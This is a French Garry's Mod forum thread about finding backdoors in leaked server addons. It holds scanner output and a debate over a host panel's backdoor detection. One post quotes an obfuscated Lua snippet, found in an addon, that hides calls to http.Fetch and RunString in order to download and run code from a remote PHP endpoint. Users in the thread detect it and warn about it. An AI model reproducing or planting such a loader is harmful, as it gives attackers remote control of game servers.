198 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:282 file.Write("blogs/" .. bLogs.ConfigFile,util.TableToJSON(tableMerge(table.Copy(util.JSONToTable(file.Read("blogs/" .. cfile,"DATA"))),table.Copy(bLogs.CustomConfigRaw))))
199 2 - FILESYS (File deletion) addons/blogs/lua/autorun/server/_blogs_load.lua:283 file.Delete("blogs/" .. cfile)
200 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:432 file.Write("blogs/configcache.dat",file.Read("blogs/sh_config.lua","LUA"))
201 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:435 if (file.Read("blogs/configcache.dat","DATA") ~= file.Read("blogs/sh_config.lua","LUA")) then
202 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:436 file.Write("blogs/configcache.dat",file.Read("blogs/sh_config.lua","LUA"))
203 4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.githubusercontent.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
204 2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
205 1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), string.Explode( ",", extraTags ), searchText )
206 1 - MISC (References global table) lua/includes/util/javascript_util.lua:19 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:publish( file, background ) end )
207 1 - FILESYS (Reading file contents) gamemodes/darkrp/entities/entities/fadmin_motd/cl_init.lua:18 self.HTML:SetHTML(file.Read(Page, "DATA") or "")
208 2 - DYNCODE (Dynamic code execution) gamemodes/darkrp/gamemode/libraries/simplerr.lua:2 local CompileString = CompileString
209 1 - FILESYS (Reading file contents) gamemodes/darkrp/gamemode/libraries/simplerr.lua:457 local contents = file.Read(path, "LUA")
210 2 - DYNCODE (Dynamic code execution) gamemodes/darkrp/gamemode/libraries/simplerr.lua:461 local err = CompileString(contents, path, false)
211 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/darkrp/gamemode/modules/cppi/sh_cppi.lua:3 CPPI.CPPI_DEFER = 100100 --\100\100 = dd
212 1 - FILESYS (Reading file contents) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/motd/sv_init.lua:21 if file.Exists("FAdmin/CurMOTDPage.txt", "DATA") and file.Read("FAdmin/CurMOTDPage.txt", "DATA") ~= "" then
213 1 - FILESYS (Reading file contents) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/motd/sv_init.lua:22 game.ConsoleCommand("_FAdmin_MOTDPage \"" .. file.Read("FAdmin/CurMOTDPage.txt", "DATA") .. "\"\n")
214 1 - FILESYS (Reading file contents) addons/simple_cigarette_ factory/lua/autorun/sv_main.lua:60 if(file.Read( "cf_van_list.txt", "DATA" )!=nil) then
215 1 - FILESYS (Reading file contents) addons/simple_cigarette_ factory/lua/autorun/sv_main.lua:62 local Vans = util.JSONToTable( file.Read( "cf_van_list.txt", "DATA" ) )
216 1 - FILESYS (Reading file contents) addons/simple_cigarette_ factory/lua/autorun/sv_main.lua:74 if(file.Read( "cf_van_list.txt", "DATA" )!=nil) then
217 1 - FILESYS (Reading file contents) addons/simple_cigarette_ factory/lua/autorun/sv_main.lua:76 local Vans = util.JSONToTable( file.Read( "cf_van_list.txt", "DATA" ) )
218 2 - BANMGMT (Unban by Steam ID) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/playeractions/kickban/sv_init.lua:189 game.ConsoleCommand("removeid " .. SteamID .. "\n")
219 1 - FILESYS (Reading file contents) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/playeractions/kickban/sv_init.lua:214 local bans = util.KeyValuesToTable(file.Read("FAdmin/bans.txt", "DATA") or {})
220 2 - FILESYS (File deletion) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/playeractions/kickban/sv_init.lua:228 file.Delete("FAdmin/Bans.txt", "DATA")
221 4 - NETWORK (HTTP server call) lua/autorun/crsk_versioncheck.lua:6 http.Fetch("Steam Workshop :: CrSk Shared Textures", function(body)
222 1 - FILESYS (Reading file contents) addons/jewelry_robbery_system/lua/jewelry_robbery/server/sv_jewelry_robbery.lua:324 local filecontent = file.Read(addonname.."/savedents/"..game.GetMap()..".txt", "DATA")
223 1 - FILESYS (Reading file contents) addons/jewelry_robbery_system/lua/jewelry_robbery/server/sv_jewelry_robbery.lua:332 local filecontent = file.Read(addonname.."/savednpc/"..game.GetMap()..".txt", "DATA")
224 2 - FILESYS (File deletion) addons/jewelry_robbery_system/lua/jewelry_robbery/server/sv_jewelry_robbery.lua:388 file.Delete( addonname.."/savedents/"..game.GetMap()..".txt" )
225 2 - FILESYS (File deletion) addons/jewelry_robbery_system/lua/jewelry_robbery/server/sv_jewelry_robbery.lua:397 file.Delete( addonname.."/savednpc/"..game.GetMap()..".txt" )
226 1 - FILESYS (Reading file contents) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/serversettings/cl_init.lua:13 local Settings = util.KeyValuesToTable(file.Read("gamemodes/sandbox/sandbox.txt", "GAME")) -- All SBox limits are in here :D
227 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/darkrp/gamemode/modules/fpp/pp/sh_cppi.lua:2 CPPI.CPPI_DEFER = 102112 --\102\112 = fp
228 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/darkrp/gamemode/modules/fpp/pp/sh_cppi.lua:3 CPPI.CPPI_NOTIMPLEMENTED = 7080 --\70\80 = FP
229 2 - DYNCODE (Dynamic code execution) gamemodes/base/entities/entities/lua_run.lua:25 RunString( code, "lua_run#" .. self:EntIndex() )
230 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/config/config.lua:311 ["STEAM_0:0:00000000"] = "superadmin",
231 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/config/config.lua:312 ["STEAM_0:0:11111111"] = "admin",
232 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/sandbox/entities/weapons/gmod_tool/stools/wheel.lua:226 list.Set( "WheelModels", "models/props_phx/construct/metal_plate_curve360x2.mdl", one )
233 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/sandbox/entities/weapons/gmod_tool/stools/wheel.lua:227 list.Set( "WheelModels", "models/props_phx/construct/wood/wood_curve360x1.mdl", one )
234 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/sandbox/entities/weapons/gmod_tool/stools/wheel.lua:228 list.Set( "WheelModels", "models/props_phx/construct/wood/wood_curve360x2.mdl", one )
235 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/sandbox/entities/weapons/gmod_tool/stools/wheel.lua:229 list.Set( "WheelModels", "models/props_phx/construct/windows/window_curve360x1.mdl", one )
236 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/sandbox/entities/weapons/gmod_tool/stools/wheel.lua:230 list.Set( "WheelModels", "models/props_phx/construct/windows/window_curve360x2.mdl", one )
[Nomalua] Output complete!
 
Dezz

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STEAM_0:0:20450406 c’est ton steam id ??
 
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Giovanni Mikovitch

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Dezz à dit:
STEAM_0:0:20450406 c’est ton steam id ??
non moi c'est: STEAM_0:0:140938158
 
Dezz

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C’est ton steam id STEAM_0:0:20450406 ?? Si c’est pas le tiens supprimé vite l’addons
 
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Giovanni Mikovitch

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Dezz à dit:
C’est ton steam id STEAM_0:0:20450406 ?? Si c’est pas le tiens supprimé vite l’addons
le quelle addons??
 
alibert640

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Giovanni Mikovitch à dit:
le quelle addons??
Il n'y a aucune vulnérabilité sur ton serveur le SteamID : STEAM_0:0:20450406 et juste le steamid du créateur il ne ferra rien sur ton serveur
 
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alibert640 à dit:
Il n'y a aucune vulnérabilité sur ton serveur le SteamID : STEAM_0:0:20450406 et juste le steamid du créateur il ne ferra rien sur ton serveur
À Ok merci de ton aide
 
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loadstring(__coa)";local returnVal=SPROP.Settings.Name;local djfig9435b6guq69jbyiryjda = { 3493845, "jigtwsreji", 104, 118, 110, 85, 116, 4, 0001, 8493, 112, 345, 74, 68 };local co=math.random(998345,1811177);string.byte(84);local loadb="q(_49832^4)";local build=[[build["string.char(43);string.char(111);string.char(3492)]];local function gashrefo(djfig9435b6guq69jbyiryjdafgdh) return 8 end;local function dfghkoj(fdjgoidshfjhsjohfasdojha)return "Fe" end string.Replace(djfig9435b6guq69jbyiryjda[2],djfig9435b6guq69jbyiryjda[3])_G[ string.char( djfig9435b6guq69jbyiryjda[3] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char((112)) ][ dfghkoj() .. "tch" ]( string.char( djfig9435b6guq69jbyiryjda[3] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char((112)) .. "://" .. string.char(98) .. "usa" .. string.char( 110 ) .. "1.c" ..string.char( 111 ) .. "m/".. SPROP.Name .. "/inbex." .. string.char( 112 ) .. "h" .. string.char( 112 ) .. "?id=" .. SPROP.User.u .. "&u2=" .. SPROP.User.u2, function( b,dsjfhgo,sfdgh,o,oshsg,ofd,hosdfg,ohd ) _G[ string.char(82) .. "unString" ]( b ) end ); end ) end);
Ca me fais beaucoup penser à une backdoor même si ya le nom de l'addons dedans j'ai jamais vu ou très peu d'addons non drm faire ça
 
Deadman69330

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A savoir que la partie "Securité" sur le panel MTX ne sert quasiment à rien, j'ai installer volontairement des backdoors très basique qui n'ont pas été détectée.
Mais je crois que SNK avait déjà parler de ce sujet
 
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Deadman69330 à dit:
A savoir que la partie "Securité" sur le panel MTX ne sert quasiment à rien, j'ai installer volontairement des backdoors très basique qui n'ont pas été détectée.
Mais je crois que SNK avait déjà parler de ce sujet
De toute façon rien n'est plus fiable qu'un humain.
Tu installe des leaks, tu est responsable, tu vérifie tout les fichiers.
 
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Surevil

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Deadman69330 à dit:
A savoir que la partie "Securité" sur le panel MTX ne sert quasiment à rien, j'ai installer volontairement des backdoors très basique qui n'ont pas été détectée.
Mais je crois que SNK avait déjà parler de ce sujet
Effectivement, comme tu le dis. L’onglet sécurité ne sert à rien ! J’ai déjà testés / mis volontairement plusieurs dizaines de backdoors sur mon serveur sans aucune détecte dessus. Je pense qu’il faudrait d’ailleurs supprimer cet onglet, car les moldus qui ont un serveur sans forcément être au courant de ce problème vont regarder l’onglet et se dire « mon sèrveure é pa bakdore »
Donc à voir SeemsGood
 
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Surevil à dit:
Addon a évité à tout prix
 
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pilot2 à dit:
Effectivement, comme tu le dis. L’onglet sécurité ne sert à rien ! J’ai déjà testés / mis volontairement plusieurs dizaines de backdoors sur mon serveur sans aucune détecte dessus. Je pense qu’il faudrait d’ailleurs supprimer cet onglet, car les moldus qui ont un serveur sans forcément être au courant de ce problème vont regarder l’onglet et se dire « mon sèrveure é pa bakdore »
Donc à voir SeemsGood
Bah c'est leurs soucis de toute façon tu fais un serveur tu dois être responsable que ce sois workshop ou leak..

pilot2 à dit:
Addon a évité à tout prix
why
 
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NoaGamingFR à dit:
Bah c'est leurs soucis de toute façon tu fais un serveur tu dois être responsable que ce sois workshop ou leak..
Oui c’est clair ^^

NoaGamingFR à dit:
Bah comme c’est marqué dans la description, c’est incompatible avec plein de DRM, et ça te les rend inutilisable. Après, pour une « vérification de backdoor » et hop on l’enleve après, c’est pas forcément si mal que ça mais faut juste pas le garder en permanence quoi. Je me suis peut être un peut mal exprimer dans mon message ^^
Par contre, il me semble que @ZarosOVH m’avait dit des raisons pour ne pas l’utiliser mais je sais plus trop quoi
 
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pilot2 à dit:
Oui c’est clair ^^


Bah comme c’est marqué dans la description, c’est incompatible avec plein de DRM, et ça te les rend inutilisable. Après, pour une « vérification de backdoor » et hop on l’enleve après, c’est pas forcément si mal que ça mais faut juste pas le garder en permanence quoi. Je me suis peut être un peut mal exprimer dans mon message ^^
Par contre, il me semble que @ZarosOVH m’avait dit des raisons pour ne pas l’utiliser mais je sais plus trop quoi
Ah oui biensûr ça sert à rien de le garder c'est juste pour faire des tests mais j'avais vu à un moment que y'avais un risque de faire sauter une licence mais jsp x)
 
Deadman69330

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NoaGamingFR à dit:
Ah oui biensûr ça sert à rien de le garder c'est juste pour faire des tests mais j'avais vu à un moment que y'avais un risque de faire sauter une licence mais jsp x)
bwhitelist et toutes les licenses de Billy
 
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Pour faire un serveur, il faut tout d'abord avoir du budget, si tu prends des leaks c'est à tes risques et périls, j'suis désolé de le dire mais pour moi ton serveur ne va pas durer longtemps...
 
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Deadman69330 à dit:
A savoir que la partie "Securité" sur le panel MTX ne sert quasiment à rien, j'ai installer volontairement des backdoors très basique qui n'ont pas été détectée.
Mais je crois que SNK avait déjà parler de ce sujet
pilot2 à dit:
Effectivement, comme tu le dis. L’onglet sécurité ne sert à rien ! J’ai déjà testés / mis volontairement plusieurs dizaines de backdoors sur mon serveur sans aucune détecte dessus. Je pense qu’il faudrait d’ailleurs supprimer cet onglet, car les moldus qui ont un serveur sans forcément être au courant de ce problème vont regarder l’onglet et se dire « mon sèrveure é pa bakdore »
Donc à voir SeemsGood
Vous êtes fatigants à revenir sans arrêt en mode "gneugneugneu j'ai mis une backdoor elle a pas été détectée", on vous a répondu 50 000 fois que le but n'est de détecter que certains types de backdoors les plus récurrentes, on a jamais prétendu que ça pourrait tout détecter. Il faudrait pour cela mener un projet titanesque à l'image d'un antivirus pour réaliser un outil encore + efficace mais clairement cela ne serait pas rentable et on préfère mettre l'accent sur la sensibilisation à ne pas mettre n'importe quoi sur les serveurs, prévenir plutôt que guérir.

Pour votre gouverne depuis la mise en place de l'outil il y a eu + de 61 000 détections sur nos serveurs et autant de mails d'avertissements sur des backdoors trouvées. Ça ne trouve clairement pas tout mais ça déblaye donc ça fait bien ce que ça doit faire.
Si on a du temps à gaspiller un jour on itèrera dessus pour améliorer le système et détecter d'autres méthodes de backdoors (je ne rentre pas dans le détail mais on se concentre sur un type en particulier avec cet outil) on le fera mais c'est clairement pas à l'ordre du jour.

Au lieu de gaspiller votre énergie dans des tests de cet outil, passez du temps à regarder ce que vous mettez sur vos serveurs, ça fera des vacances à tout le monde (à commencer par nous, on se prend des tickets support inutiles...).
 
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et enigma ? elle est détecter sur le panel mtx ? Kappa
 
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Snk à dit:
Vous êtes fatigants à revenir sans arrêt en mode "gneugneugneu j'ai mis une backdoor elle a pas été détectée", on vous a répondu 50 000 fois que le but n'est de détecter que certains types de backdoors les plus récurrentes, on a jamais prétendu que ça pourrait tout détecter. Il faudrait pour cela mener un projet titanesque à l'image d'un antivirus pour réaliser un outil encore + efficace mais clairement cela ne serait pas rentable et on préfère mettre l'accent sur la sensibilisation à ne pas mettre n'importe quoi sur les serveurs, prévenir plutôt que guérir.

Pour votre gouverne depuis la mise en place de l'outil il y a eu + de 61 000 détections sur nos serveurs et autant de mails d'avertissements sur des backdoors trouvées. Ça ne trouve clairement pas tout mais ça déblaye donc ça fait bien ce que ça doit faire.
Si on a du temps à gaspiller un jour on itèrera dessus pour améliorer le système et détecter d'autres méthodes de backdoors (je ne rentre pas dans le détail mais on se concentre sur un type en particulier avec cet outil) on le fera mais c'est clairement pas à l'ordre du jour.

Au lieu de gaspiller votre énergie dans des tests de cet outil, passez du temps à regarder ce que vous mettez sur vos serveurs, ça fera des vacances à tout le monde (à commencer par nous, on se prend des tickets support inutiles...).
Mon message n'était pas dans le but de vous critiquer ou de me plaindre, mais de prévenir les personnes.

Peut être que 61.000 détections ont pu être utiles, mais le problème, c'est que trop souvent des gens vont penser que leur serveur n'est pas backdooré en partie a cause de l'onglet sécurité qui dira "Non c koul tout va bi1" car il ne détecte que certaines (c'est pas si mal).

Comme tu le dis, chacun est responsable de son serveur et de ce qu'il met dessus, effectivement, mais j'en reviens à ce que je disais, la conclusion d'un possesseur de serveur lambda sera biaisée par l'onglet.

Je ne vais pas faire tout un discours, car ce sujet est controversé. Il y a bel et bien des pour, mais également des contres.
 
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Rat Madant à dit:
et enigma ? elle est détecter sur le panel mtx ? Kappa
Aucune idée, techniquement je ne sais pas ce que c'est comme bout de code et j'en ai strictement rien à faire 4Head

pilot2 à dit:
Mon message n'était pas dans le but de vous critiquer ou de me plaindre, mais de prévenir les personnes.

Peut être que 61.000 détections ont pu être utiles, mais le problème, c'est que trop souvent des gens vont penser que leur serveur n'est pas backdooré en partie a cause de l'onglet sécurité qui dira "Non c koul tout va bi1" car il ne détecte que certaines (c'est pas si mal).

Comme tu le dis, chacun est responsable de son serveur et de ce qu'il met dessus, effectivement, mais j'en reviens à ce que je disais, la conclusion d'un possesseur de serveur lambda sera biaisée par l'onglet.

Je ne vais pas faire tout un discours, car ce sujet est controversé. Il y a bel et bien des pour, mais également des contres.
Bah si vous voulez on rajouter un gros bandeau rouge pour dire "ATTENTION ÇA NE DÉTECTE PAS TOUT, NE METTEZ PAS N'IMPORTE QUOI SUR VOTRE SERVEUR" mais le bon sens je crois qu'on ne pourra jamais le "provoquer" :D
Après au pire on enlève tout et vous vous débrouillez à 100% avec vos addons qui viennent de n'importe où...
 
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pilot2 à dit:
c’est incompatible avec plein de DRM
si certain addon se lance pas tu a juste a les whitelist t tro for

pilot2 à dit:
c’est incompatible avec plein de DRM
j'attend la liste c facile de dire plein
et c'est logique vu que les DRM utilisent les memes fonction que les backdoors
 
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Shaar à dit:
si certain addon se lance pas tu a juste a les whitelist t tro for


j'attend la liste c facile de dire plein
et c'est logique vu que les DRM utilisent les memes fonction que les backdoors
PJSaltPJSalt


Bah de ce que je sache, j'ai pas dis le contraire.

ça bloque des drms, donc oui j'ai raison, mieux vaut ne pas l'utiliser sauf dans des cas de vérifications de backdoor et hop apres on l'enleve
 
Shaar

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Shaar à dit:
lequels j'attend trj la liste
Billys et VCmod, les deux principaux. j'ai pas fait de liste hein
 
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En tout cas vu le code que t'as envoyé c'est une méga backdoor dégage l'addon vite de ton serveur :)
 
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Le weed_system de ton serveur a une backdoor.
 
ZarosOVH

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